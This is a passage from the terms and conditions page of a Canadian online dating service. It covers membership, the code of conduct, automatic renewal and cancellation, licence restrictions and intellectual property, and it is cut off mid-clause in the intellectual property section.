Go</strong><br /> CP 21523 BP Ste-Famille, Sherbrooke QC J1G 5K2<br /> Canada<br /> Email: <a href="mailto:support@canada-singles.ca">support@canada-singles.ca</a></p> <p style="text-align: left;">1.5         The Agreement, as it may be amended from time to time, applies to all users of any our Services.</p> <p style="text-align: left;">1.6         If you become a Member, you will be able to access the Services associated with the Company product(s) for which you hold a Membership.  If you meet certain requirements, the Company may in its discretion make your profile visible to Users of other Websites and Apps operated by the Company for which you do not have a Membership.</p> <p style="text-align: left;">1.7         The Agreement also applies to you use of all features, widgets, plug-ins, applications, content, downloads and/or other services that:</p> <p style="text-align: left;">1.7.1         we own and control and make available to you; or</p> <p style="text-align: left;">1.7.2         also post a link to this Agreement.</p> <p style="text-align: left;">1.8         You are reminded to abide by all applicable laws.  You also undertake not to use our Services for unlawful, harmful, threatening, abusive, harassing, tortious, defamatory, vulgar, obscene, libellous, hateful, or racially or ethnically offensive purposes (or for purposes which are otherwise objectionable).</p> <p style="text-align: left;">1.9         If you violate these Terms & Conditions, we may terminate your access to our Services.</p> <p style="text-align: left;"><ins cite="mailto:James%20Apps" datetime="2017-12-04T11:38">THESE TERMS & CONDITIONS CONTAIN IMPORTANT INFORMATION REGARDING YOUR LEGAL RIGHTS, REMEDIES AND OBLIGATIONS. THESE INCLUDE VARIOUS LIMITATIONS AND EXCLUSIONS.</ins></p> <p style="text-align: left;"><ins cite="mailto:James%20Apps" datetime="2017-12-04T11:38">THE LAW WHICH GOVERNS THESE TERMS & CONDITIONS DEPENDS ON WHERE YOU RESIDE.  PLEASE READ SECTION </ins><ins cite="mailto:James%20Apps" datetime="2017-12-04T11:38">24</ins><ins cite="mailto:James%20Apps" datetime="2017-12-04T11:38">. </ins></p> <p style="text-align: left;"><ins cite="mailto:James%20Apps" datetime="2017-12-04T11:38">IF YOU RESIDE IN THE UNITED STATES OR CANADA, OR YOU BRING ANY CLAIM AGAINST THE COMPANY IN THE UNITED STATES OR CANADA:</ins></p> <p style="text-align: left;">·        <ins cite="mailto:James%20Apps" datetime="2017-12-04T11:38">YOU AGREE THAT DISPUTES WILL BE RESOLVED BY BINDING ARBITRATION;</ins></p> <p style="text-align: left;">·        <ins cite="mailto:James%20Apps" datetime="2017-12-04T11:38">YOU WAIVE ANY RIGHT TO PARTICIPATE IN A CLASS-ACTION LAWSUIT;</ins></p> <p style="text-align: left;">·        <ins cite="mailto:James%20Apps" datetime="2017-12-04T11:38">YOU WAIVE ANY RIGHT TO A CLASS-WIDE ARBITRATION; AND</ins></p> <p style="text-align: left;">·        <ins cite="mailto:James%20Apps" datetime="2017-12-04T11:38">YOU WAIVE ANY RIGHT TO PARTICIPATE IN A JURY TRIAL.</ins></p> <p style="text-align: left;"><ins cite="mailto:James%20Apps" datetime="2017-12-04T11:38">PLEASE READ SECTION </ins><ins cite="mailto:James%20Apps" datetime="2017-12-04T11:38">25</ins><ins cite="mailto:James%20Apps" datetime="2017-12-04T11:38">.  </ins></p> <p>[/vc_column_text][/vc_tta_section][vc_tta_section title= »2. DEFINITIONS » tab_id= »1596407867806-204d70a2-6893″][vc_column_text]2.1         In these Terms & Conditions:</p> <p>2.2          “<strong>Apps</strong>” refers, individually and collectively, to each and all of the Mobile Apps, Desktop Apps, and Web Apps.</p> <p>2.3         “<strong>Desktop Apps</strong>” means the desktop applications published by the Company and which may be offered from time to time.</p> <p>2.4         “<strong>Member</strong>” means any person whose Membership to has been accepted by the Company and whose Membership remains valid for the time being.  The term ‘Member’ includes free Members and paying Members, as the context requires.</p> <p>2.5         “<strong>Membership</strong>” means your entitlement to one or more Services by virtue of being a Member.  Such entitlement may vary depending on whether the Membership is a paid Membership or a free Membership (and the relevant Company product for which you have a Membership).</p> <p>2.6         “<strong>Mobile</strong> <strong>Apps</strong>” means the iOS application and the Android application or any other mobile/tablet device software applications published by the Company and which may be offered from time to time.</p> <p>2.7         “<strong>Privacy Policy</strong>” means the privacy policy available at <a href="https://canada-singles.ca/privacy-policy/" target="_blank" rel="noopener noreferrer">https://canada-singles.ca/privacy-policy/</a>, which combined with the Terms & Conditions represent the Agreement between you and the Company.</p> <p>2.8         “<strong>Services</strong>” means any and all of the services provided by the Company by any means (including, but not limited to, the Websites, the Apps, or any other technology).</p> <p>2.9         “<strong>Terms & Conditions</strong>” means these terms and conditions which, together with the Privacy Policy, represent the Agreement between you and the Company, as varied and as amended by the Company at its full discretion at any time and published on the Websites.</p> <p>2.10      “<strong>User</strong>” means any Member and/or Visitor.</p> <p>2.11      “<strong>Visitor</strong>” means any person who browses the Services.</p> <p>2.12      “<strong>Web Apps</strong>” means the web applications published by the Company and which may be offered from time to time.</p> <p>2.13      “<strong>Website(s)</strong>” means, individually or collectively, the websites operated by the Company.</p> <p>2.14      As the context may require, words in the singular may be read as the plural and the plural as the singular.[/vc_column_text][/vc_tta_section][vc_tta_section title= »3. YOUR PRIVACY – COLLECTION AND RETENTION OF PERSONAL INFORMATION » tab_id= »1596407927489-04dd054b-03e1″][vc_column_text]</p> <p style="text-align: left;">3.1         We are bound by European privacy laws.  We explain what we do and don’t do with your data in our Privacy Policy at: https://canada-singles.ca/privacy-policy/</p> <p style="text-align: left;">3.2         We do not always encrypt your messages, and we reserve the right to monitor those messages and other content for compliance with our Terms & Conditions (for example, where the content of your messages is reported for breaching our Terms & Conditions).</p> <p>[/vc_column_text][/vc_tta_section][vc_tta_section title= »4. ACCOUNTS AND SECURITY » tab_id= »1596407986758-ba404da7-0fc9″][vc_column_text]</p> <p style="text-align: left;">4.1         To access the Services, you must have an account.</p> <p style="text-align: left;">4.2         You must maintain, and are responsible for, the confidentiality of your logon and password.</p> <p style="text-align: left;">4.3         If requested, you must provide us with a form of identification to verify your identity.</p> <p style="text-align: left;">4.4         The Services are open to everyone – subject to approval of an application by the Company according to these Terms & Conditions.</p> <p style="text-align: left;">4.5         The Company requires all Users to undertake to abide by the Privacy Policy and these Terms & Conditions, including, in particular, by agreeing to the Code of Conduct at Section <strong>6</strong> below.</p> <p style="text-align: left;">4.6         You may not use our Services if:</p> <p style="text-align: left;">4.6.1         <strong>You are under the age of 18. </strong></p> <p style="text-align: left;">Children are not eligible to use our Services, and we ask that anyone under the age of 18 years old not submit any personal information to us.  Our Services are not directed at anyone under the age of 18 years old.  We also do not collect or maintain personally identifiable information from those Users who we know are under the age of 18 years old. Should we learn or be notified that we have collected information from Users under the age of 18 years old, we will immediately delete such personally identifiable information;</p> <p style="text-align: left;">4.6.2         <strong>You have ever been convicted of a violent or sexually related criminal offence.</strong></p> <p style="text-align: left;">We do not conduct criminal background screenings of our Users, nor are we able to personally identify each User. The Company cannot be held liable for false declarations made by a Member. It is thus important to take certain common-sense precautions when meeting with another Member.  For example, consider informing a close friend or relative of any meeting and plan your first meeting in a public place.</p> <p style="text-align: left;">4.6.3         <strong>You have previously been banned from using our Services or similar services</strong>.</p> <p style="text-align: left;">4.7         The Company cannot be held liable for actions of any nature committed by any User, including any such actions in the course of any events which are organised by the Company or by others using the Services.</p> <p>[/vc_column_text][/vc_tta_section][vc_tta_section title= »5. CONDITIONS OF ADMISSION » tab_id= »1596408002606-ea19932b-9164″][vc_column_text]</p> <p style="text-align: left;">5.1         You must agree to these Terms & Conditions in order to use our Services. They govern your use of our Services.</p> <p style="text-align: left;">5.2         If you do not accept the Privacy Policy and these Terms & Conditions, you are not entitled to access our Services.</p> <p style="text-align: left;">5.3         If you:</p> <p style="text-align: left;">5.3.1         use our Services;</p> <p style="text-align: left;">5.3.2         click to join and/or sign in; and/or</p> <p style="text-align: left;">5.3.3         check a box to indicate you agree to these Terms & Conditions,</p> <p style="text-align: left;">(as may be the case), we will take this as your acceptance of these Terms & Conditions and your agreement to their content.</p> <p style="text-align: left;">5.4         The Company reserves the right to offer admission to its Services in its full discretion.</p> <p style="text-align: left;">5.5         By using our Services, you represent and warrant that you have the legal capacity to enter a contract in the jurisdiction where you reside.</p> <p>[/vc_column_text][/vc_tta_section][vc_tta_section title= »6. CODE OF CONDUCT » tab_id= »1596408037223-13ae79f9-8c93″][vc_column_text]</p> <p style="text-align: left;">6.1         Each User undertakes to comply strictly with all applicable laws and regulations, as well as with these Terms & Conditions.</p> <p style="text-align: left;">6.2         Each User irrevocably undertakes to refrain from:</p> <p style="text-align: left;">6.2.1         Discrimination on the basis of a User’s real or supposed: age, race, color, ethnicity, national origin, sexual orientation, religion, gender identity, family situation, pregnancy, physical appearance, surname, state of health, disability, genetic characteristics, personal beliefs, political opinions or union activities;</p> <p style="text-align: left;">6.2.2         Using the Services for any professional or commercial purposes, whether directly or indirectly, including offering, soliciting or promoting chargeable goods or services or financial compensation.  Prostitution is formally prohibited on our Services;</p> <p style="text-align: left;">6.2.3         Engaging in any illegal activity whatsoever using our Services;</p> <p style="text-align: left;">6.2.4         Posting any content or making any statement in any form which:</p> <p style="text-align: left;">(a)              infringes, misappropriates or violates a third party’s patent, copyright, trademark, trade secret, moral rights or other intellectual property rights, or rights of publicity or privacy;</p> <p style="text-align: left;">(b)             violates, or encourages any conduct that would violate, any applicable law or regulation or would give rise to civil liability;</p> <p style="text-align: left;">(c)              is fraudulent, false, misleading (directly or by omission or failure to update information) or deceptive;</p> <p style="text-align: left;">(d)             is defamatory, obscene, pornographic, vulgar or offensive;</p> <p style="text-align: left;">(e)              promotes discrimination, bigotry, racism, hatred, harassment or harm against any individual or group;</p> <p style="text-align: left;">(f)              is violent or threatening or promotes violence or actions that are threatening to any other person;</p> <p style="text-align: left;">(g)              promotes illegal or harmful activities or substances;</p> <p style="text-align: left;">(h)             contains a link to any of content associated with the above prohibitions; and</p> <p style="text-align: left;">(i)               is otherwise contrary to applicable laws and regulations; and</p> <p style="text-align: left;">6.2.5         Disseminating any personal information of any other User, including any contact details or similar, without that User’s consent.</p> <p style="text-align: left;">6.3         Each User undertakes to report any abuses to the Company, as well as any improper comments or conduct by other Users.</p> <p style="text-align: left;">6.4         We conduct regular inspections of the use of our Services, including for safety and fraud protection purposes.  We reserve the right to remove all or part of any content created, used or circulated publically or privately by Users which is not compliant with applicable laws or regulations, or which violates these Terms & Conditions.</p> <p style="text-align: left;">6.5         We may contact any User to request that the User remedy any non-compliance with applicable laws or regulations, or these Terms & Conditions.</p> <p style="text-align: left;">6.6         We may exclude or remove any User from its Services in our sole discretion for any reason, including, but not limited to, any non-compliance with applicable laws or regulations or these Terms & Conditions.</p> <p>[/vc_column_text][/vc_tta_section][vc_tta_section title= »7. CONDITIONS OF ACCESS » tab_id= »1596408075079-b13f29f3-75fc »][vc_column_text]</p> <p style="text-align: left;">7.1         You shall select a username and a password when signing up to our Services.</p> <p style="text-align: left;">7.2         When you sign up, you will become a Member of the particular brand of the Services for which you have registered.  Although the Company in its discretion may make your profile visible to the Users of one or more of its other Services if you meet requirements, you will not be a Member without specific registration.</p> <p style="text-align: left;">7.3         Your username and the password shall be personal and confidential. Each Member shall keep them confidential and undertakes not to notify or disclose them to third parties or other Members to prevent fraud or phising.</p> <p style="text-align: left;">7.4         All Users undertake not to use another Member’s username or password, or any other personal information of another User.</p> <p style="text-align: left;">7.5         Any breach of these provisions may lead to the cancellation of a Member’s Membership, without prejudice to the liability incurred by the relevant Member due to the use of the username and/or password by another Member or third party.</p> <p style="text-align: left;">7.6         Each Member shall take care not to disclose strictly personal information.</p> <p style="text-align: left;">7.7         We will take any necessary measures to halt fraudulent behaviour, including to prevent the prohibited sharing of usernames or passwords.</p> <p style="text-align: left;">7.8         We reserve the option of removing:</p> <p style="text-align: left;">7.8.1         information published or present on the Websites for more than 6 months;</p> <p style="text-align: left;">7.8.2         the account of a Member which has not been used for more than 6 months after the end of a subscription or has never been used after admission to Membership, after verification that no subscription is in progress.</p> <p style="text-align: left;">7.9         Each User undertakes not to carry out any action likely to hinder the operation of the Services and undertakes not to disseminate or arrange for the dissemination of viruses, spam, logic bombs, software applications, etc.</p> <p>[/vc_column_text][/vc_tta_section][vc_tta_section title= »8. PAID FEATURES » tab_id= »1596408101096-99064676-faef »][vc_column_text]</p> <p style="text-align: left;">8.1         You may purchase a paid Membership for one or more of the products offered by the Company.</p> <p style="text-align: left;">8.2         Your paid Membership will only give you access to the particular Company product for which you have registered.  Although the Company in its discretion may make your profile visible to the Users of one or more of its other Services if you meet requirements, you will not be a Member of those other Services without registering for it specifically.</p> <p style="text-align: left;">8.3         The price and payment procedures are permanently accessible on the Websites.</p> <p style="text-align: left;">8.4         All prices stated include all relevant local taxes.</p> <p style="text-align: left;">8.5         We reserve the right to change the cost of any of our Services.  If you are not happy with the cost of any Services, you may cancel your Membership in accordance with these Terms & Conditions.</p> <p style="text-align: left;">8.6         To the extent permitted by applicable laws and regulations, no refunds will be offered (except in exceptional circumstances such as major service failures).  There will be no refund of any payment made by you for a paid Membership if you haven’t cancelled your contract according to these Terms & Conditions.</p> <p style="text-align: left;">8.7         If you do not pay any amount due pursuant to these Terms & Conditions:</p> <p style="text-align: left;">8.7.1         We reserve the right to suspend your access until such time as the outstanding payment is received or to terminate the contract without prior notice. The contract period shall remain unaffected by the temporary closure.</p> <p style="text-align: left;">8.7.2         We may, in accordance with applicable law, forward any debt in arrears for a reasonable period to an external collection agency for recovery. Debt recovery fees will be charged by the external collection agency on the overdue account balance.</p> <p style="text-align: left;">8.7.3         In accordance with applicable law, you may be charged 10% of the overdue account balance as an expense for debt recovery.</p> <p style="text-align: left;">8.7.4         You are entitled to prove that the account balance is not in fact outstanding, or that the account balance is lower than alleged.</p> <p style="text-align: left;">8.7.5         This clause shall not affect the assertion of damages caused by the overdue account balance.</p> <p style="text-align: left;">8.8         We may, from time to time, offer paid features (such as subscriptions, micropayments, etc.) through other service providers, such as the Apple app store or the Android market (each, an “<strong>App Store</strong>”).</p> <p style="text-align: left;">8.9         Such paid features may be subject to other payment conditions and other conditions than those in these Terms & Conditions.  The relevant App Store may require you to agree with its own terms & conditions.  Any such applicable terms will be brought to your attention prior to purchase. You agree to comply with, and your license to use our Services is conditional upon your compliance with, all relevant terms and conditions of the applicable App Store.</p> <p>[/vc_column_text][/vc_tta_section][vc_tta_section title= »9. AUTOMATIC RENEWAL » tab_id= »1596408118455-b821da32-e02e »][vc_column_text]</p> <p style="text-align: left;">9.1         <strong>We automatically renew all paid Memberships before the expiry of the term of the paid Membership (where permitted by applicable law). When you first subscribe for your paid Membership, you acknowledge that when your paid Membership expires it will automatically renew for the duration and at the cost indicated to you at your initial purchase. Where required by applicable law, the renewal date will be specified in a renewal notice provided to you.  IF YOU DO NOT WANT YOUR PAID MEMBERSHIP TO AUTOMATICALLY RENEW, YOU MUST CANCEL YOUR PAID MEMBERSHIP IN ACCORDANCE WITH THE PROCESS SET OUT BELOW IN THESE TERMS & CONDITIONS.</strong></p> <p>[/vc_column_text][/vc_tta_section][vc_tta_section title= »10. CANCELLATION AND WITHDRAWAL » tab_id= »1596408163704-9f269962-3144″][vc_column_text]</p> <p style="text-align: left;">10.1      There are three ways of cancelling your Membership:</p> <p style="text-align: left;">10.1.1      Cancellation of free Membership – you may cancel at any time (see <strong>Section </strong><strong>11</strong>);</p> <p style="text-align: left;">10.1.2      Cancellation of your paid Membership during the 3 day cooling-off period (see <strong>Section </strong><strong>12</strong>);</p> <p style="text-align: left;">10.1.3      Cancellation of the automatic renewal of your paid Membership after the cooling-off period has expired – you may cancel automatic renewal at any time and enjoy our Services until the end of the paid term (see <strong>Section </strong><strong>13</strong>).</p> <p>[/vc_column_text][/vc_tta_section][vc_tta_section title= »11. CANCELLATION OF FREE MEMBERSHIP » tab_id= »1596408200191-71d3c285-7817″][vc_column_text]</p> <p style="text-align: left;">11.1      You may cancel your free Membership at any time.</p> <p style="text-align: left;">11.2      You may cancel by logging into your account on the Websites and following the links, or by writing to<span style="color: #ff0000;"> <a style="color: #ff0000;" href="/customer-care/">Customer Care</a></span> or by <strong>email to </strong><a href="mailto:cancellation@canada-singles.ca" target="_blank" rel="noopener noreferrer">cancellation@canada-singles.ca</a><strong> or by post to</strong></p> <p style="text-align: left;"><strong>Global Fusion Media</strong><br /> subsidiary Company<br /> <strong>Ads Go</strong><br /> CP 21523 BP Ste-Famille, Sherbrooke QC J1G 5K2<br /> Canada<br /> Email: <a href="mailto:dataprotection@canada-singles.ca">dataprotection@canada-singles.ca</a></p> <p>[/vc_column_text][/vc_tta_section][vc_tta_section title= »12. CANCELLATION OF YOUR PAID MEMBERSHIP DURING THE 3 DAY COOLING-OFF PERIOD » tab_id= »1596408222705-7bfdd049-6e5a »][vc_column_text]</p> <p style="text-align: left;">12.1      As a paying Member, you may withdraw from your paid Membership at any time <strong>within the first three days</strong> of making your initial payment provided that you have not started using the Services (for example, by sending messages to other Members).</p> <p style="text-align: left;">12.2      You may withdraw by logging into your account on the Websites and following the links, or by writing to Customer Care at <a href="https://canada-singles.ca/service-clientele/">https://canada-singles.ca/service-clientele/</a> or by <strong>email to </strong><a href="mailto:withdrawal@canada-singles.ca" target="_blank" rel="noopener noreferrer">withdrawal@canada-singles.ca</a><strong> or by post to</strong></p> <p style="text-align: left;">Canada Singles Customer Care –<br /> <strong>Global Fusion Media</strong><br /> subsidiary Company<br /> <strong>Ads Go</strong><br /> CP 21523 BP Ste-Famille, Sherbrooke QC J1G 5K2<br /> Canada<br /> Email: <a href="mailto:dataprotection@canada-singles.ca">dataprotection@canada-singles.ca</a></p> <p style="text-align: left;">12.3      If you cancel your Membership within the first 3 days of your paid Membership and you have made any payment in advance for the Services, we will refund these amounts to you (again, provided that you have not started using the Services).</p> <p>[/vc_column_text][/vc_tta_section][vc_tta_section title= »13. CANCELLATION OF AUTOMATIC RENEWAL » tab_id= »1596408242142-4ff60dc0-52df »][vc_column_text]13.1      If you are a paying Member and you did not cancel your paid Membership in accordance with section 12, you may apply for cancellation at the latest 24 hours before the date of renewal of the subscription.  If you cancel your paid membership less than 24 hours before the expiry of the term of your paid Membership, <strong>YOUR PAID MEMBERSHIP WILL BE AUTOMATICALLY RENEWED IN ACCORDANCE WITH THESE TERMS & CONDITIONS (WHERE ALLOWED BY APPLICABLE LAW)</strong>.</p> <p>13.2      <strong>THE CANCELLATION OF YOUR PAID MEMBERSHIP WILL BE EFFECTIVE UPON THE EXPIRY OF THE RELEVANT PAID PERIOD</strong> AND YOU WILL HAVE FULL USE OF OUR SERVICES UNTIL THAT TIME. <strong>NO REFUND IS APPLICABLE</strong> UNLESS APPLICABLE LAW OR THESE TERMS & CONDITIONS OTHERWISE PROVIDE.</p> <p>13.3      Following cancellation of your paid Membership, you will retain a free Membership with a more limited scope of Services.</p> <p>13.4      You may cancel your automatic renewal by logging into your account on the Websites and following the links, or by writing to <a href="/customer-care/">Customer Care</a> or by <strong>email to </strong><a href="mailto:cancellation@canada-singles.ca" target="_blank" rel="noopener noreferrer">cancellation@canada-singles.ca</a><strong> or by post to</strong></p> <p><strong>Global Fusion Media</strong><br /> subsidiary Company<br /> <strong>Ads Go</strong><br /> CP 21523 BP Ste-Famille, Sherbrooke QC J1G 5K2<br /> Canada<br /> Email: <a href="mailto:dataprotection@canada-singles.ca">dataprotection@canada-singles.ca</a>[/vc_column_text][/vc_tta_section][vc_tta_section title= »14. CANCELLATION OF YOUR MEMBERSHIP BY THE COMPANY » tab_id= »1596408267182-70ff7ad7-5572″][vc_column_text]</p> <p style="text-align: left;">14.1      If we cancel a Member’s Membership for that Member’s breach of these Terms & Conditions, the Member shall not be entitled to a refund for the period remaining to elapse until the expiry of the account, without prejudice to any damages sought by us as compensation for the loss suffered.</p> <p style="text-align: left;">14.2      If we cancel a Member’s Membership in its sole discretion for reasons other than that Member’s breach of these Terms & Conditions, the Member shall be entitled to a refund for the period remaining to elapse until the expiry of the account.</p> <p>[/vc_column_text][/vc_tta_section][vc_tta_section title= »15. TECHNOLOGY REQUIREMENTS » tab_id= »1596408282446-732a3522-c770″][vc_column_text]</p> <p style="text-align: left;">15.1      The technology you use to access our Services may be required to meet minimum specifications provided by us.</p> <p style="text-align: left;">15.2      We may require that you download and install updates to the Apps from time to time. You acknowledge and agree that we may update the Apps with or without notifying you and add or remove features or functions to the Apps (and/or the Apps, the Websites and/or the Services) at any time in our sole discretion.</p> <p style="text-align: left;">15.3      You acknowledge and agree that we have no obligation to:</p> <p style="text-align: left;">15.3.1      make any subsequent versions of the Apps available to you;</p> <p style="text-align: left;">15.3.2      make the Apps, the Websites and/or the Services available to you at all;</p> <p style="text-align: left;">15.3.3      continue to support the Apps, the Websites and/or the Services in any way. You acknowledge that your access to the Apps, the Websites and/or the Services may not be continuous, features may change during your use, and we may terminate your access or stop offering any or all of the Apps, the Websites and/or the Services at any time.</p> <p>[/vc_column_text][/vc_tta_section][vc_tta_section title= »16. TERMS & CONDITIONS – UPDATES AND AMENDMENTS » tab_id= »1596408307838-4000f679-1807″][vc_column_text]</p> <p style="text-align: left;">16.1      The Company may update and amend these Terms & Conditions at any time and the Company will make the updated Terms & Conditions available through the Services. You understand and agree that you will be deemed to have accepted the updated Terms & Conditions if you use the Services after the updated Terms & Conditions are made available to you. If at any point you do not agree to any part of the Terms & Conditions in operation, you should immediately stop using the Services.</p> <p>[/vc_column_text][/vc_tta_section][vc_tta_section title= »17. PROVISION OF THE SERVICE » tab_id= »1596408328230-d3351375-15fd »][vc_column_text]</p> <p style="text-align: left;">17.1      You acknowledge and agree that the Company may make changes to, or stop providing, the Apps, the Websites and/or the Services, or restrict your use of the Apps, the Websites and/or the Services, at any time without notifying you in advance.</p> <p style="text-align: left;">17.2      You are solely responsible for all data, SMS, mobile carrier, Internet and telecommunications fees and charges incurred in connection with your use of the Apps, the Websites and/or the Services.</p> <p style="text-align: left;">17.3      You acknowledge and agree that the Company can disable or deny you access to the Apps, the Websites and/or the Services, without notifying you in advance, for any reason or no reason including, without limitation, for any violation of these Terms & Conditions and/or if the Company suspects that you have used any aspect of the Services to conduct any fraudulent or illegal activity. If the Company disables your access to your account, you may be prevented from accessing the Services, your account details or any materials contained in your account.</p> <p>[/vc_column_text][/vc_tta_section][vc_tta_section title= »18. LICENSE, RESTRICTIONS AND CONDITIONS OF USE » tab_id= »1596408350016-74efa433-5770″][vc_column_text]</p> <p style="text-align: left;">18.1      Subject to the terms and conditions of this Agreement and for the sole purpose of using the Services, the Company hereby grants you a limited, non-exclusive, revocable, non-sublicensable, non-transferable license to:</p> <p style="text-align: left;">18.1.1      install any or all of the Mobile Apps on one or more mobile devices which are owned by you, are under your control and which meet the Company’s minimum specifications;</p> <p style="text-align: left;">18.1.2      install any or all of the Desktop Apps on one or more computers which are owned by you, are under your control and which meet the Company’s minimum specifications; and</p> <p style="text-align: left;">18.1.3      view, review and utilize the Apps and any related information provided to you by the Company.</p> <p style="text-align: left;">18.2      You agree not to access, or attempt to access, the Services by any means other than through the Websites or the Apps. You specifically agree not to access, or attempt to access, the Services through any automated means (including, without limitation, through the use of scripts, bots, unauthorized third party apps, spiders or web crawlers).</p> <p style="text-align: left;">18.3      You agree that you will not, in connection with your use of the Apps, the Websites and/or the Services, violate any applicable law, ordinance, rule, regulation or treaty.</p> <p style="text-align: left;">18.4      You shall not connect to or use the Apps, the Websites and/or the Services in any way that is not expressly permitted by these Terms & Conditions.</p> <p style="text-align: left;">18.5      You may not:</p> <p style="text-align: left;">18.5.1      remove any proprietary notices from the Services or any copy of software provided to you by the Company (“<strong>Software</strong>”);</p> <p style="text-align: left;">18.5.2      cause, permit or authorize the modification, creation of derivative works, translation, reverse engineering, decompiling, disassembling or hacking of the Apps, the Services or any Software;</p> <p style="text-align: left;">18.5.3      sell, assign, rent, lease, act as a service bureau, or grant rights in the Apps, the Services or any Software, including, without limitation, through sublicense, to any other person or entity without the prior written consent of the Company; or</p> <p style="text-align: left;">18.5.4      make any false, misleading or deceptive statement or representation regarding the Company and/or the Apps, the Websites or the Services.</p> <p style="text-align: left;">18.6      Without limiting the foregoing, YOU AGREE THAT YOU WILL NOT:</p> <p style="text-align: left;">18.6.1      engage in any activity that:</p> <p style="text-align: left;">(a)              promotes discrimination, bigotry, racism, hatred, harassment or harm against any individual or group;</p> <p style="text-align: left;">(b)             is defamatory, obscene, pornographic, vulgar or offensive;</p> <p style="text-align: left;">(c)              is violent or threatening or promotes violence or actions that are threatening to any other person;</p> <p style="text-align: left;">(d)             infringes, misappropriates or violates a third party’s patent, copyright, trademark, trade secret, moral rights or other intellectual property rights, or rights of publicity or privacy;</p> <p style="text-align: left;">(e)              violates, or encourages any conduct that would violate, any applicable law or regulation or would give rise to civil liability;</p> <p style="text-align: left;">(f)              is fraudulent, false, misleading (directly or by omission or failure to update information) or deceptive;</p> <p style="text-align: left;">(g)              constitutes phishing, pharming or impersonates any other person or entity, or steals or assumes any person’s identity (whether a real identity or online nickname or alias); or</p> <p style="text-align: left;">(h)             is otherwise contrary to applicable laws and regulations;</p> <p style="text-align: left;">18.6.2      disseminate any personal information of any other User, including any contact details or similar, without that User’s consent;</p> <p style="text-align: left;">18.6.3      institute, assist, or become involved in any type of attack, including, without limitation, denial of service attacks, upon the Apps, the Websites and/or the Services (or any servers, systems or networks connected to the Apps, the Websites and/or the Services);</p> <p style="text-align: left;">18.6.4      attempt to obstruct, disrupt or interfere with the operation of the Apps, the Websites and/or the Services or any other person’s or entity’s use of the Apps, the Websites and/or the Services (or any servers, systems or networks connected to the Apps, the Websites and/or the Services);</p> <p style="text-align: left;">18.6.5      attempt to gain unauthorized access to the Apps, the Websites, the Services, accounts registered to other Users, or any servers, systems or networks connected to the Apps, the Websites and/or the Services;</p> <p style="text-align: left;">18.6.6      use the Apps, the Websites and/or the Services to</p> <p style="text-align: left;">(a)              develop, generate, transmit or store information that is unlawful or illegal, defamatory, harmful, abusive, hateful, racially or ethnically offensive that encourages conduct that would be considered a criminal offence; or</p> <p style="text-align: left;">(b)             perform any unsolicited commercial communication not permitted by applicable law.</p> <p style="text-align: left;">18.7      Each User undertakes to report any abuses to the Company, as well as any improper comments or conduct by other Users.</p> <p style="text-align: left;">18.8      We conduct regular of the use of our Services from time to time, including for safety and fraud protection purposes.  We reserve the right to remove all or part of any content created, used or circulated publically or privately by Users which is not compliant with applicable laws or regulations, or which violates these Terms & Conditions.</p> <p style="text-align: left;">18.9      We may contact any User to request that you remedy any non-compliance with applicable laws or regulations, or these Terms & Conditions.</p> <p style="text-align: left;">18.10   The Company may at its option, terminate its relationship with you, or may disable your account immediately if it determines you are using the Services contrary to the restrictions found in this Section 18 or any other terms of these Terms & Conditions.</p> <p style="text-align: left;">18.11   We may exclude any User from, or terminate any User’s access to, our Services in our sole discretion for any reason, including, but not limited to, any non-compliance with applicable laws or regulations or these Terms & Conditions.  You acknowledge and agree that you are solely responsible, and the Company has no responsibility or liability to you or any other person or entity, for any breach by you of these Terms & Conditions or for the consequences of any such breach.</p> <p>[/vc_column_text][/vc_tta_section][vc_tta_section title= »19. LINKS TO OTHER WEBSITES » tab_id= »1596408375910-82da1b54-5b7e »][vc_column_text]</p> <p style="text-align: left;">19.1      Our Services may contain links to other websites and to resources provided by third parties (“<strong>Other Sites</strong>”). The Other Sites are linked to provide information only and are solely for your convenience.</p> <p style="text-align: left;">19.2      The Company has no control over, does not accept and assumes no responsibility for the content or products or services of Other Sites and does not accept any responsibility for any loss or damage that may arise from your use of them.</p> <p style="text-align: left;">19.3      If you choose to access Other Sites, you do so at your own risk and on the terms and conditions and in accordance with the privacy policy (if applicable) of the Other Sites.</p> <p style="text-align: left;">19.4      Our Services may also feature advertising by third parties. By allowing third parties to advertise on our Services, the Company does not make any representations or warranties in respect of or endorse the products or services advertised.</p> <p>[/vc_column_text][/vc_tta_section][vc_tta_section title= »20. INTELLECTUAL PROPERTY » tab_id= »1596408393541-000ae934-3d70″][vc_column_text]</p> <p style="text-align: left;">20.1      All intellectual property rights (including the various rights conferred by statute, common law and equity in and in relation to copyright, patents, trademarks, service marks, trade names and/or designs (including the “look and feel” and other visual or non-literal elements) (whether registered or unregistered) in:</p> <p style="text-align: left;">20.1.1      our Services;</p> <p style="text-align: left;">20.1.2      Subject to clause 20.3, information content on our Services; and</p> <p style="text-align: left;">20.1.3      All the design, text and graphics, software, photos, videos, music, sounds, and their selection and arrangement, and all software compilations, underlying source code and software (including applets and scripts) of our Services,</p> <p style="text-align: left;">are owned by or licensed to the Company. You shall not, and shall not attempt to, obtain any title to any such intellectual property rights. All rights are reserved.</p> <p style="text-align: left;">20.2      None of the material listed in clause 20.1 may be reproduced or redistributed or copied, distributed, republished, downloaded, displayed, posted or transmitted in any form or by any means, sold, rented or sub-licensed, used to create derivative works, or in any way exploited without the prior express written permission of the Company. You may, however, retrieve and display the content of our Services on a computer screen (including any tablet or smartphone device), store such content in electronic form on disk (but not on any server or other storage device connected to a network) or print one copy of such content for your own personal, non-commercial use, provided you keep intact all and any copyright and proprietary notices. You may not otherwise reproduce, modify, copy or distribute or use for commercial purposes any of the materials or content on our Services without the express prior written permission of the Company.</p> <p style="text-align: left;">20.3      Title, ownership rights and intellectual property rights in and to content accessed using our Services is the property of the applicable content owner or supplier and may be protected by applicable copyright, trademark or other law. Subject to the limited rights described in clause 20.2, this Agreement gives you no rights to such content.</p> <p style="text-align: left;">20.4      The authors of the literary and artistic works in the pages in our Services have asserted their moral rights to be identified as the author of those works.</p> <p style="text-align: left;">20.5      Any material you transmit, post or submit to the Company either through our Services or otherwise (<strong>Material</strong>) shall be considered (and the Company may treat it as) non-confidential (subject to the Company’s obligations under privacy legislation). You grant the Company a royalty-free, perpetual, irrevocable, non-exclusive licence to use, copy, modify, adapt, translate, publish and distribute world-wide any Material (other than Ideas).</p> <p style="text-align: left;">20.6      All comments, suggestions, ideas, notes, drawings or concepts in which intellectual property rights subsist which are disclosed or offered to the Company by you or offered in response to solicitations by the Company regarding our Services (<strong>Ideas</strong>) shall be deemed to be and shall remain the property the Company and you hereby assign all existing present 